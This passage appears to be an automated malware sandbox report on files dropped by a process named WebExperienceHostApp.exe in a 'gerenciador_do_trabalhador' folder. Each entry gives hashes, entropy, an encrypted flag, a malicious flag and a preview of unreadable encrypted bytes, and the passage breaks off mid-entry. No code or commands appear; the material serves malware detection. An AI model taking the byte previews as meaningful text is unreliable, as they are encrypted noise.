                                                                  Preview:...N.].M.rr.2n.._.n...;...Z.."E..y.U,..x.E.:.8.r..i..+.?.!.....1.....c..V..!..._......^....V..=...^7..k....<..(.,...$.+....ED..-.[.LcV".T....>..4.9s6..)........-....(r...h.e9...U.2t..W.>.e..l..<z.y.|;...>..{.h..R?6E.,....e.!?.j...l...o.F...}9....r.9.;....t.2.......C....."1.^#.].E.....M......6..K.h.....".~...Z.d..}...U..4..;y......-y.r&.h.......d.......L..Q.......!.P.6......:S.:.".a.s\aX-.6...B...........^A..q.p...)V....8XL..V....I...5Y.z..J..>.....G....)B.Aa.....v.u..R<.!.w_.I..../>...[>..J.?D..b]...!.YR.,..'Q...3B...Q.....`...^,4..{..U............&.........&Jl.h..[@"E...\..s..|Q..l...1.6..s...4.g.....vp....J..I.1.R].^.w0,...c.m.x.h0..%..]8C0..>\.V.....F.C...10..T"...[x..h<............Zf.....z~...V...e.Fnx c..k.y&.....o.4E...\.$....?.<L.U.D...Y....0...9Lc.U?....nR".....T .I.W.f..h.4.Kl..p.Ag.h.I..4...<@.\\;w$W?e.n..........5......?...*.....f.S....%^w\........'&..m.......6...W......6...'.bG...X.y.`.e.)..5 .7..G..T..\.N...9.\MmO2$.
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):31388
                                                                  Entropy (8bit):7.993553977949406
                                                                  Encrypted:true
                                                                  SSDEEP:768:iJLcWyPWoLfFA1Jf6Vi0NT7q9bzS4qEx2Rs+KE:imWyPVL2fixuq4qoID7
                                                                  MD5:B8393402C92EB5B566D316890AD1D19F
                                                                  SHA1:A922D2E8A2930CFBC98DA9D220E314015E6F3F5E
                                                                  SHA-256:E9EDF0887EA5CE8EFE4A9361559326C3D7ADF381E7F4C604FBE6E6064E2AED9C
                                                                  SHA-512:C2FB0E390843C27279B3B69A6AAB58AE9C8BD30D5019170C712C0310F59747DA0710EEB5A869918E0D0FE105E2DD79D1A1C968BCB733542AEFE9B8C2BA7DBE76
                                                                  Malicious:true
                                                                  Preview:...|=R.....a...D.c..7.<..p.Y...y.`..@./.=..Sh....-BYP.5.(....8....C.r..B.v........3..8b.y....WZ......j.n2F.9..O$...K.x./R9N.b.G{.\!...=.).,.T6.....xz..@.P..j$....z.0..TYj....W..&.az#..3aZ{+...V.o.;3...$........D.....?>.M..72*....4/./t.O.=.5V.l7...........,...6...W.S..^o`....9.e....l.}j...Q..o..D........+...!:..cO...g./. .~!a......?J@....f].%...f.q..d.R9.#.C....O.=...0...<..p.?d....v.....+M).....>.q...4...Jn@y......^v.*u.aK...k...!m..s..T..w....[U+.......-....8.!..w;..I.M.I.A..A/.|...........Fd(.c..r?J......*...2...2e.I.t!VS.....R...m........b#.;/d.....L...0.......C ..,z..Uw..{;zT.z........e.Bo.'.."X.w..=.>....s...`-.:.P.A/..}..%}...wcp....0.-..[.T.v.t.v.......~Q......}.M.m.g!.&EQ....+lC...=...)..g.k{t...s..?.m..@).EX..."..k.q.q...g-.(..c..=.C}TUFwC...E.e,w....;.....5p..........(jT.....<..<.....|.g..8.M.....B...r.hR.G..|...0F.....[..C.z1...u.S.\V.&....)..J....VL*&...iac.....X.ty.0..Y..(*".=O................\..D.v...H.....0a.#.....?.!n9a
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):72678
                                                                  Entropy (8bit):7.997134552088717
                                                                  Encrypted:true
                                                                  SSDEEP:1536:M35974nemnLM7WH6S46vXHTh7r69Are+cAzEbpCRMFkVW9ZctocVaizqJ:isn5nLcQ7PzdgocAzVMzmTLC
                                                                  MD5:F0ED5412A9CACBBCB5CFC09E306C49F0
                                                                  SHA1:B2EB294C19FF3104F938ADFC64742013DC9218C6
                                                                  SHA-256:41C08A34207748AC2E3877D27276F4DBA0404BFC76664E732887578538C6B026
                                                                  SHA-512:4C0FD918118B0445D8D8BC77D52C6D86FDD78312B0FBE476EE3EE604C4E9A432E28A9EB097CF56956E32712CA85628AF8D210B8067176531368EB746237FEE5B
                                                                  Malicious:true
                                                                  Preview:K..=....I........o..1...R..I..o......,.q..e..k..E.&H..6.dw3a....{.+12\..J.6z..n..c ...Z0..p....U..bTt.^f...".o.w......xX.w;Z...6.....P.8AI..]....n.(.PF.[B.G....}....kBZ....j..wF"+.....d.B..g".A...Ih....o((....(>.S)YD..%....M...t.b2.....].^....N.....{.R(|.@Z,.5q.i.d.......r.... ...oYTv]a....3..o....sQ....#Gc.^..1nm.....N.<.'.`..y..?.....T..7..q....{..W.`D..(t.O....Y.2..#,...jS%..2....qNr..W...3..6...|V.....y...kM8.v...<.Ko.U.h..v...o...L.]..[.wwF..vo.Q......i.S..U.Q...!.-.r&0...N.6^q..#..}..... ^R.1P\.I....ko.R.ad.Lr.E.....+.k&.....h...........)....Jy.'...V.)&d.... 9B....t..W......X............U.&...,.@b.~..u..,1..8.0.l...M>..Z ...........|..j..X.....HOh`zZ......C.D....E..}\FB....!......j._..R........#.O.A..v8.m........ei.<.7*......D......!P.5.hA..,DI.v..dc.....f<.UC?......q...e.2..W..7..O...%...XgTXZ.+.....i[K..p^I.'?H.o9.JIl....."g..6.Y.%....&?O .W.......%.....+ C&..ZsSQP`.....&.(%...K9....3.K.XY.D.S.@s.i.\R7.O.#.Z$.ac.om.A..)...u.....
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):97479
                                                                  Entropy (8bit):7.997548337897213
                                                                  Encrypted:true
                                                                  SSDEEP:1536:NU17thO9VWnICXjqrSwuTdegZH4kAMzF3fFaUlwgLtz7s4gbNNGsKltm1+QFlY8F:NUFrvbjESdTogZnzFaYvs4WfGlU+QFlR
                                                                  MD5:802E029C20C38A8F328215569A431A4C
                                                                  SHA1:964942E05BAF1FD46AE49468C9E60A032EADB7D8
                                                                  SHA-256:6B01760D88F92A0E1808178FA67559B1BDA9E6AB0A42D41D3ECE874A371B18B4
                                                                  SHA-512:1D4BFB7F3AFC8318DE4449AEABC2F2B0BAE203DB9EFF30E8D8782D1E146E0375815373D5625488574981A76B45C5EBADAF1571E9FFCCA43A3EBB77FD4906C893
                                                                  Malicious:true
                                                                  Preview:0.......t.].K..b...x.Ow...{.._>....O.....N..v.rp>9.....k...6=._.>..c?.G.O..`s..r..._...{.f...L.....v.....l...S...C.*....55..,........t.a...xD....|...i..e...|.&8../u...Zh...{.H...!..y..U.c(.e.w....t....;.AN.7#.8/....J.4...c..X.M...g0..g..1.1.....qF...._k].........f...[...7.;...W..[...}..|..ig...B...8.j.............&r...x{...l.Q.S...p-.E.[.W..+~..x..(5..s1.@.......#RL...!..P..x..A.n.|.......|Z.......>.[...,..Z.|....<.>.^NY*...R4.P.%u*.^76......ZIq..@SOb#wO...a....j.Z{....6;Hb6..o.\H.,i"X.........r...@....\..q[.&.)...K.N.UD\..%....."..T...I...g..R@f.'v...=..W*NsY..}.Q..f....9Z..E......3.}#=.X#Xa..{.,mN."!....T;wQ.p.w...ud..%.I..<'*...&.o.zf....R..GQ-...Vf......98..[~....=..A..4.#.3.........#]g.K...(n.A.c%..H.k.X._...-t.K.R......2/..OC.YUS.A/...|.........TB........0a..kQ6...q.p.Z.O.....<O......si.=...+....*...@..n.N[..6,}.....R5...`..g...>..LRL...5.~...-".z.ZH..o.5+.q...$...fUF.I.....{.9n9......2.G./.... nZ...|b.&.._.M.RO?".......x
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):37155
                                                                  Entropy (8bit):7.995000093480915
                                                                  Encrypted:true
                                                                  SSDEEP:768:F9Wl+QmDeG6AYPOUwVnHv8pD4cHWUhSiQYxPb8fhg:75QmDefAYPPAP8p7BMZYxPehg
                                                                  MD5:A2B495E556C29583A5457FDD5056D0F1
                                                                  SHA1:B2F34D095B9299E4DF4075686CFF9F6C9FF8F5E2
                                                                  SHA-256:228FE92C0C44A266956C9D5F603F3B94B458272D4D5476CE8D25762CA27556CB
                                                                  SHA-512:132F82CD3EEACE46872F71074A795363D8C3CA7F6CD0AC3DB78651D91C34AE475D1A7D43B0BF9BE73002A35AA80158C59201E517B1F326B1666EED3578981CA4
                                                                  Malicious:true
                                                                  Preview:q'.q.GF...x..-5ZG.W.a........C.M....?.A..%d..u.]... O3.%d..so..k.g..O....Z..l...&..7..b...rP.< >k..).*.'.C2..zd....._.......[t*+`...+.....z.WpU..dN.._f.;di:U.....*E1...B.....Q. ..{..fbk.0V....|.zS...f......i..G_.......%...T>|..I.+...vj.o.f.?...2...$.....f....h.Z.G.8.@.1..........$k.........{q}N.XK..7.W...........%..=...!.^#.s..@@q.I...L... ..L...H..vr.B'.....[.....Nk./j_a ......|Z....-I...j+G..e..r+?....\RM.XCv.......BQ..."VO]j.`X.7...i..L.Q.>...o.u.....T......2.7.B..xs.....x8.`.{..t.-....82.a'A......3T.V...C...-\.Gl7.....lC......w.%...TJ.v{M.n....^l6.../..@L.Ys..5.s..Z...\..4...RBG./.K...b.<(..(v.l.cIl.tp%.pB.l....I...$..fI..bu...c...h.[.....m.../1a.[?....Eq.......#.....~8...T.<P.).|.v.8.|....hoV...Xpy^..4...>..A......0...~\.........!.....q.l....Kf1,-P...T|.J6.g,k.HO..+^.. nD]k{.|...rt.}.<>u.........s.}W.].....(B.TF.~Y...(...u......G...3.X'$:).h3*...0Bb.YP...'r..DG$...o. ..[...F.S...Bc.~.7....X.....e.......w.}=wc!Bm..|..}\^.......N.........:..|.:....K!
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):85182
                                                                  Entropy (8bit):7.997870667848278
                                                                  Encrypted:true
                                                                  SSDEEP:1536:rFy561FQAL32O4bOPldT13OssxHmwdx8T3ET6OVa6Z:pC61/32ObPll1ess138TyV
                                                                  MD5:458232535F5370AEF3143BE37A8BABDA
                                                                  SHA1:4C0DDDACA13494FFCF0372911880B9A76D9BD1F8
                                                                  SHA-256:BEB29C72B92B1C7693890BB21C11366E6F72DC0AAD8EE9A62AA7532AB7D6CB8A
                                                                  SHA-512:B8F300F30F44E9B204AE77C0A00468B8C0A76CA381ACA5C2341998017BCDDAF1020426977915A85DF79B119B9F18C0AA23AC11C75364DC6FF6BE0D3E938662D1
                                                                  Malicious:true
                                                                  Preview:....!S......|p...B)q.(...e..:"I...3.....(P.0p.j.[.*..v/<E`=....8......u.N.\..w.j.0.m.Rg......7^P.Q+......'N.Oi.,..@..[.+.....E.].v.\r.sa..p..|0..;...}9..%....oY...HN.z...t.x...)..iJ...nz......Eu-..a..Kd.?p......U3....o2.~.q...jS.-.......0V.K3.G.{..k[.1x...u{.Q.E...,?U......@x@..s.... #D....L./.L.2...AS.^P&Pa.Z.L(.'N.Ug..4..;....g.o....]s.vWl7.;r9'R]..,.EU..a.....@.T.gD,.Ha7...UT.gd..D..E?..9......Wi.=.=/...d...5*.F/V....0.D..m=H$..._......S....=..p./.L).&..b..t..l..F(6..X.=n|.c..q.O.h..+.&vn.............:..fm.:.i%6...k..4............2..B`s01...U...2,.y..PD...E...^.0.>.I...I...."X..n...+.........Qn}T.z@.6...<.1...`o...R...u..|& ....~.H..q#..m..u....P..}.%...h.@o.&.u..^..<..@...]S..Y......aW....eH3.n[...y..#.E."N.$...M.Qd.Wl~9.....^a......y..........5.V.LR\....y@.q.....'.........cw<0...;...T..T1..]|.f....x./T..fh.a..D.a.g:..2......).Y.d.(.Y..EW...ZR$.Z........B.._.0#....r.7._..J.._%h./...}.T.....H.e.....y>.\.j.J........<....._.W....O..rN...+.....
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):28902
                                                                  Entropy (8bit):7.993241166696542
                                                                  Encrypted:true
                                                                  SSDEEP:768:nPJV7SIKkXfYDKe4n4Uf98Upf6oBiEN4CmZu/2nvLxIH:nPJSkXfULUfneEaCmZznzxIH
                                                                  MD5:5D9BB698C5A4761DD137044A3BB372BE
                                                                  SHA1:1652F8FEFD829B909937B076D2A6742A9F34D1FE
                                                                  SHA-256:5967CFE92B9473758E8AE11F1838E948F3EF428727373A991680269DEB8AE15F
                                                                  SHA-512:27EB7E41EAD84E537CD072EE15675C7754CBF0B33335046039EB41A02EBDC42EB98510307E57ACE78ED1A3105880AEC91F939DC25A4BD0600B1905F27B085CBD
                                                                  Malicious:true
                                                                  Preview:......{.gB...R8RW..]..RH,1XQ..T.OJ.CMp............"Ux.{...4....i.)~e.H..3....k.5.;`..{*..u..9..V.".O.!..7..$....o.a....&lr.;.... ...z../.v.....2rwS.k{.\.2t..W....6.h_'.....j9.........q.&...WB`.d./..t+?.|.*.V...P.......^.F.PF.=.x2m....e.'.w.o...?...O=.....O.....s.).k......E(..v\.U.@......)....Z..F.Pi..c..O...p-.I|.[.ZJ...x.w....p^q..u-.&.."..>:.)o.C..yK?.....1...*.....k.qO(&........I...x.f....m....&.F.h#....qZ... m.[..;.d..iUD.d.D.\g.\....kXU.>..W..<9.H.?....w)..F..$..&F2cBCTR.....q........$V....t.D.=..LO..pj.b@....?.......a.......5;.....2..O.h.zU.(....x...I....Nj.....&.Dt....W...uBU..X.f=z.f~.[usKw.H....H.x.6B]...Z''3.....%-...;..j...Z.]..s...~....C..Lw....^.XF..@...vN...\..H5j.5....D.....%:...``.L..1.7+..EyI.da.<....w0..*[T.......e.i..W.@..i..0......4..T..!`$..]..L...U.........@'Ac.:.$&..*y..=.{t..jI.......p.........`!".D`...:i*5'QD....?k+EN$........[..w?..._{..5..3.{u.3pY.<t.H1.a]...H..F.'..C._..x....Ho.^u....^.....8.{..u.x.Ap@-n;X
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):90063
                                                                  Entropy (8bit):7.997978048003362
                                                                  Encrypted:true
                                                                  SSDEEP:1536:P/y1Fav6puOSbb2ZPWGaqysLtriHJgbazKp12K2nTDFZi6Z:Xy6v5OSbaZPWGaqTLFegm01g1E6Z
                                                                  MD5:4752F4947AC9E08217CB1EEA6E9A1373
                                                                  SHA1:028B187AE131E220C73892945BBD47A18DFF75A6
                                                                  SHA-256:1978D6F70C6DCF9067D384C2AD2E76B6ACC25E9EA187300B311BF18AD495C305
                                                                  SHA-512:ED5E898E56421DE0CA90286A386DF89A83BB4A50CE414AD196D0722D0668B2B2099597F56651CEE22703EAFC8E509EC8858B12494D6CFA1AEC804259088F8B5F
                                                                  Malicious:true
                                                                  Preview:..+.g.k....?..7m.u..1...(e...}._M.5.6..;....%.D......f.n..b+...?....._..o..?.J".d;}.I^...G.Eul...U...R&7.....B..mW.pT=....k...ZX.)..U.O.f..u...B..`....-;...*.{6.qv....U.lB..Qy.9..,.|A...<o$...9.D.7u.*.q?..@.......{...p^..}.4..Y.%(..wo:`W.j..#.Aox....X..@..N.R7.p ......7mr+......!.....{'f....l.....G...k0,8.....AW.(.E..&.....</...{.M..-..G...3..f.....P..Yv....I".qjT..Md.1(..Y.J>.2........?l...2...)H.Y......3R...R#.i^..%..g8.....u.W...lC..nZ.4.5{S.v...!".....z....}....i....Vl.H...R.J..(W....6.X.$f.#.~.2..{.!..=..J..s....0.E(}.i..Y..QL..O.Q.,.*.L.,a...?....d...)(/.dYz.JA...;......\.Yw..G/.8|K}......S...&.?.#M..3...LhBZ?.7..y.:s/U..-ws.....A.B.aVH.hB....~..8..x'X[.Rr6X<}]....._ ...2.A..8..)_J.....n.z..'.R.....\.4...{.p..&....S..0.^zY.M..o..yr..S0.....Z.....".^.a.>.xJ...[.8;(.jl@..`\I..H..r."M.c.S.e...!.R..Q.4.V&@..*O|uk}..,)[..E..C.A..1@c...P...D....FD.....M}[q....h.&.zY.6v......w..Ub...F_S4t.....aa..j.|%....K...aN......9..!.#....i2.(_..MkZBG.j..
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):85341
                                                                  Entropy (8bit):7.997527809534056
                                                                  Encrypted:true
                                                                  SSDEEP:1536:Yuz802suckUPriZAaueKwpR5vaSySfuV5uLC9S1Ak9n/eV2G5P++JbFCRRqHjLML:zJVxuAauehpDvagfuXsC9Ul2V2G5PjFK
                                                                  MD5:FC554A9ED730ECDC0FDAAFD29FE56255
                                                                  SHA1:59E7C072A6820E9797B89F8F89A97E452A2025CF
                                                                  SHA-256:26B4DBD9AE8A610837D0D73F2E34E22213724A4637FBE6EB861141A1B2DBE8FB
                                                                  SHA-512:F687A66CD2DD13502FE6EDCBB2AEEDD8A088F23A38B58301A7AB93F32EF704A8E69357D17825A66E843918A4EF7536A11406B3ED2FCA07FE89C073F4A0579A9A
                                                                  Malicious:true
                                                                  Preview:<...m....pS...v....K.?.......N.fD`c.'..si....Y......._0/....^...d.4s<..S.W....!7B$...SS(U.E.p..|..&~)..9.]..... t..mt5V."...vAw..I.....b.....9...I...[.>V..:b....|~X.>g....qZ..8O......a.Z>......fF.N.}...ST8..p~...@.#f^/.\RU.Q...3..~Sf..J.{5..S.....+......_......(....~?.Qsj..--".j....oP..3@..>$.(.%U.C._'.D...'Cc.y.N\.X..!..q....\...4...3...H....5[.].D....'@.....m...S.=..j.....A.<..k}.*YDib\9}..'..a..<|.:RG.v.'....h.....V........2.[.....'.....E.c...1u..e.4...e)^...q....M.....^...%..L.b7I*..-#....d.Sr,.LM.N....kb...s).=_.x.P.'.i.....{_...9...[o4.!.Z.f9.}.|... c..............J.?.s6.=...T.6.!;.i.,.&...P......N...,.....k6....._.Iy....h3|....u..C......'_.~..o$vC......f~L.W..8.fa.}.DY..Q...c+.3&c.....v....3.....tb...<.D....!.>.Z.l...6...+.sQ.U.._..m......:.kB.=.../.Q.......]...\...H...,....9\.%.."...:.."...2.....)m&s's....)m6a.z...W....y.t.'.f.A.v..).......v........bqzv.B......rA%p...X...b']y|.}.-t.s....'.q.{7..-RnV..|...?.Wh$.J.y...k.7
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):26428
                                                                  Entropy (8bit):7.993304138733814
                                                                  Encrypted:true
                                                                  SSDEEP:768:qL4N2ZXJNi057IVUHqM/Y2gIOlSeGQCRB82A/9:qdNJXqUHqM/1R8J/9
                                                                  MD5:FD11EEE06911152EF148D16414FE4BCB
                                                                  SHA1:9040DC2979125A9BF9A707C12814EC1881A314B8
                                                                  SHA-256:21FBD87F2D36DDEB97147F07C7C8F7935D073C3FD2ABB6FEF68E7C2B9953D075
                                                                  SHA-512:CD00380D7B4293599D4927ED7534ED29116C7CE6DAF61B4678FBAC31C488A9D14C907E0BB50008E458759AB99BAA0ED63C2704494059F8182FA4303CE53A33AF
                                                                  Malicious:true
                                                                  Preview:...>....6..".*k"[..$.+~...\gQ.w$M..Z=.<.7)H......$}z\$;..J.RXt./..4.....6.....V..R....\...#.n}.z...)...[.f..luV....z..'..~......<..C..t...y......M.q.8...._.....3/7.`[.c.P.Dn.\..3...T`.ey.4..Y..=..:.,.e@...q.S8..M,*......p...bN..@o..#..n.X..@..t9.\d.W....QE..y!bS.!j.........n....9w...?H.....x.p.,....K21...G.,....O....Q!.DB...)...G....'Z..5j.A.O...6Z.=....../.k`...D...p.......r.KU .A_...[sc...)..nl.l...2....#....".2.(8...d.w6.0.Z...#q,Am..5.l1....y.J5Z.Sy.....@T./.8........O..B.....;.Tl.C.6.JV..4...r|^[....8@........4.].$J..W&X@.|..K..2F.[S.X#..E.}..v?..^.w..El..#5..*5c..=.._....oc?UC....`..R.....|.4...kn...R.B.....C..k.2...$;.....J...!#5^..F.......U..'.....k.'E./...Hs..^Q......o.;%....<...........i.;..D.o,?......Dv.=.L.uW=...K.T./V....28&.X5...K..w.4....m3..H..........T..to).O'..yr1....~.w.P&:Q.H....D..A....P-.x..>{[........;.o..)8K.q=y.4..NN0..C..\.Z.T....{.'...|."\.ra..c..n..~......... ..}....I$u..g...H..@.&...(^.........K....#..L..3...2m.r...m
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):100408
                                                                  Entropy (8bit):7.998283449503362
                                                                  Encrypted:true
                                                                  SSDEEP:3072:Qcq8QiChijKNpxN9PW2ALVQeVUbQDwkdXs:QcqfrGs9+BLfVkCdXs
                                                                  MD5:C761409D18F6AD93E7744465D2F63D11
                                                                  SHA1:32DDDED664346EC04B7C9F8BFE8D1209F96E27EC
                                                                  SHA-256:D25418CB3C0E9E3ABA3A2CDD74E70046481D8E8EA9C57785EAAF7483AC7F30F6
                                                                  SHA-512:9D418AB7149A76F9660D77C801F5CE148480BFF19EBB8DDCA0F685595763B4DDC2DA5DAF19D9472EE5F0EA3B52740E0E1D18A92B5019EE85381BE3237256064B
                                                                  Malicious:true
                                                                  Preview:.....z..Jw.......>'>.9.T[W.W...L.L.........dx=.2*..I..=...h.m..ZH....}.p..>.......-g0...e4..%^...4d*.:.../.2..V......1{..K..=q@"TU?...P:....(....U........f.2d[..h.Y8.Kl..b.)....xb........A...t......lwT..6].@...`....r-.@.$:.Ei0+....y2Y0..VX$.,o.q(...#X..1.SN..5..........G.O._...~.e..7. #..h...W...|.R....c..s.x.T..<.).....c+j.w.._.j7..x3.`.S8...U...|.`z.........;.jX...CM.fooL...Y.mK2'9....a?.z<g.....,W..Z......i2O.?<..\.dS....CO...z7L.B....W...b.2j,.0....aH...)Go.6..0I].8*9<.......-p...t...F.y~q.Au<w.........6d...^VE.9...>.9.9}..M[h.]-.....#C..V..~.FP..5.......II.].i>W.9e~..rOZw]. ......1r.R....E...!...`.....Y...t(.L...D.V.f.k..]|...0..o`7.-..kl>..t....e<..M.hF...a.$..c.e.SH..../n#e..Y....r...e.hx4...%../{n.`..&J.....$...M.....GN..Z>&..vg......Up3P....q7.]D .h.~@...wK.5.L.Q.M...N#.$8..pr.qGe.....g...d..s..{i....B.N.w..Sx@..,.?N...$HND.j.m.}.U0@..........PEx....f>.\$..<./.}..nE..........-`SR.?.T5.i,.1[sm..}...............4.M-.N...kjj|.0f.....{
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):40474
                                                                  Entropy (8bit):7.995172259437193
                                                                  Encrypted:true
                                                                  SSDEEP:768:scW5l/ci9zp5l6W4nCTSNJmbXrTwjiC/BjtPM0N9MAUynixMPBqVWURk:VWL0IjFOObwji0BhxNefo3Pkwck
                                                                  MD5:BF23D68C10690EF8B07A8334C20FDBA2
                                                                  SHA1:2D0A319C3978349BAC3AF363CA72E9F0CA5AB2B8
                                                                  SHA-256:2491C432A3D5ABC0BE492C657B3A74F8A7A2F75BAF3596D1B61373C2614E8611
                                                                  SHA-512:936D9FF6779F99CAF536C19217A898666A6087376373575A02254A7774DF821ACD8B3EAD870EF5C8BB84A32ABAC7977BA4CD960D1744BA4B4109211CD3F61C31
                                                                  Malicious:true
                                                                  Preview:.jgeD..~.......!>I..u...,.y....D.;...m..}...=.*...u..Z...S.V..w.......7.:..DLy.8N....q.........g.S{........U.]X,.6#/V..[...A...f6..X..._..5..LX..._P*.KF...S9d7......].....l.....M.N...h.7...X.0.\..Kh.:.?...o8e.$.f...DQ..x.."f8.k{.n.^...'.Bo..), ..5.O....v.83........[|/..}...w]...B..l+......h..=..1s>.GA...V.{aBy.xS.y....@..2{..,...`....h.......w..}`z.X#.q..Jn.Y$3..]4.!..7.b.>.Exv..o.d.^..#.k..`..}.#u.'.tR..w.U&%k.?.w2't.(....u0.H.......y9....7.. `.4.7.E#....,-dmg.:..3....Or...+..G..sxqa...zqf_}[^.)..).d.,FL.q#.^....k.'...nZ. .)|?x......#....[.p.;......rwR..3.......T].../../u.....j7..U........c;D[Zh.I..Wa..<..B.....$..b...0......6.Z...7.....ma.]..Wl...k...2.v.......IH_.|=.lB"3......."M..zMB.Z....yP...}3z-\j..........U........1.\.J.&....$..(U.j).&Y.N..?....*.=..3Y..~...g..[.6.$.[.*....|....l6.I\..s...f..$.Z..km4v,}...u{.. ."......r.k....W.%N....M.q.....?..p...&...\.......a.....=-.T.*.C...3.5.:..$.jT.`.xS........kC`.2e.X.u....X......0.
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):98741
                                                                  Entropy (8bit):7.998243054332217
                                                                  Encrypted:true
                                                                  SSDEEP:1536:oX3fRSJ+xEsiYjMjkiv2/ancWq6xFHQByrkFbMG+XUDwer4BQmxmFRq+aR:oXvx8Yjniv2/MqS7oFwGbDw/Bz
                                                                  MD5:79958A2AA153BE7B553CC2D96CD06D04
                                                                  SHA1:9EFF9E58E82B0DFE8E20807539A42D8170D92FDD
                                                                  SHA-256:D687198F3020867A65A145C59C529A75C00D8DABBC77E1CD5F97A43CD04CC0D1
                                                                  SHA-512:6F91D5B8226F8EB575BE2A0D6054F1EFC82A96D33F39F2A5EC192AB01D6431B706F4DAEF19003CDA8D2E43C2BC185A33A72AB10F944C223BC380AC6FDAF84949
                                                                  Malicious:true
                                                                  Preview:..C.+]"1......s..U^.<,N6)...w....Q..Z~..A.6.G...Z.....Z.V...?...@U\.5w.....(..y...w.y.x..l....I1...G......S..=..\.{s...3A....:...S...et.....)...).G.x..@.t.h..."...v+....P^Z..c4%R....P..O....)<.+.~.@)b.1...c.....LL."C..'....nB...o.O2....2.G.-O>(^...j.*.F......\"e.$^y6o.D...d...X.......~d..l.B.......K.n....VC..8.M.Xd..T<T...X%.....-E.6..}>.R..+`.........J.]....7b.^..L.(...w..u.J..'&8.Uc.v}..[g..Zy)^..j.+..G.PY.S.$..T\[l.E.u.O...E......*.te.x....r.....La....G..F..h..?.}.....*.W..2..L.\+W..<.^4bm..E..W..+......}...E.....7./k..`....u..F..E..].(.3..<D..$....A.......wQ<...`wP.l..J...H9.......{....Ob}....).......f...6...["S....+..UNU1.6..".*p.1.Q.\.X....~I.uK.........r...Q.T.........".....J.>.Y!..8.....dT""..D.%d....w_.=(*s._.@..*..w.u.7....6...f..;...T......h5g.)!...r.c<.t.......B...]..0....t..4.]..o.cuH......X......Yx=P..,=.yF."(c..n...1!..qJ..K....:;"..3p.-N....].d..........nf!.u...C..G..7.iu...I..\.....K.i.q.....OW.....Y56;E.s7..6*..1.Rg.......*V.@....
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):78862
                                                                  Entropy (8bit):7.997909594863668
                                                                  Encrypted:true
                                                                  SSDEEP:1536:DbRSOeN5aKCd6OCQMPsjWsUtxfKxunGrYN2LZH/8yI3P6ek4xhviUf:vAOeN5aKCIOfHjWsSSxuGUNW/03K4xhp
                                                                  MD5:848E786A4E27DE29734B05E8AE9F8F43
                                                                  SHA1:AB96918CBCFFE7AC2CB56B394B6C4335D615310B
                                                                  SHA-256:50E5697EDD5442A9C525183CA029F1AF0ACF5DA8ACE34EB94E1F249E931E0399
                                                                  SHA-512:D0BB25FA9F9622E263D74CCBA895B9942A5B795F941F7A566C27A7324964CFDB41D381BB86C67E2191942EA5434E666C556CFB4CF534652918A51290D5E19E78
                                                                  Malicious:true
                                                                  Preview:i..|.W2#.....1...L.ut.....O.]..L5......L...y....N.Ci'...6.....f...%.Y{..F....]...-1.dwd.R..N..........0..ii.W_R..`..v=ML..e.....D...%Fn...*.zF}..N...z..].I..I."..`...s..[...F.._Z....O...lA`.3.|...G..M.8.........`.R..7.tF.....u&K[&.[W.t..l..&..f.Hw.c.-..p.....{.d*..Q7(...-_.....h....m..7.#.I.r9.mJ...,.Q..... q9..$.29*g..(..F....pt:j......."<.r.j...+C.I..;.(..J|....}...)!..Ir."q..Ia..G+x.kY..qQEl...yW@M..q....r.y..,.u.H....j#.C...8C.....M..}...R..JQ=bf..?..X.._.A.Eg.2@Q,..eM.....d....~.q...."0....#.."..q.T..,...0#...dR9F..wE..=o".wJ..n..9.....C.J.U..G-B8.....c....$....E.O=N......c.u]!..C+SS.}/..h.A..*..W.8I.....=..@;.....y.t.......!....I.F....'.IT-$..s.q*e..tl.....`]T....f../L.Sk.;.U..*`.}......b|..}.X.h.R.^P..D}-..B2.L.......fV^...9..!9.x....bW..8..p.\...:.Fd53.&........z.....;!..Y9..`.}..In..4.$.H........u]...cx.a.........'.Qk}..f..3......9q..xT.^D....?.nEo..;.hD).jb5j.......]Yw+...!....T.t..&Z.s18.P@.c.....P..m|G.9.s.6.C.f.VJ.9
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):70735
                                                                  Entropy (8bit):7.997547189908903
                                                                  Encrypted:true
                                                                  SSDEEP:1536:8IG9B9COoGYLSHsY+QOnHOWDtd1FAh7+Gh8nBkC8UPWtrE0/8IMD/gX:8b9B9Cx6sY+nnhDbvi7+GynKUP2E0/8A
                                                                  MD5:8111587F6EEF94E20D82D1D47A75D2C0
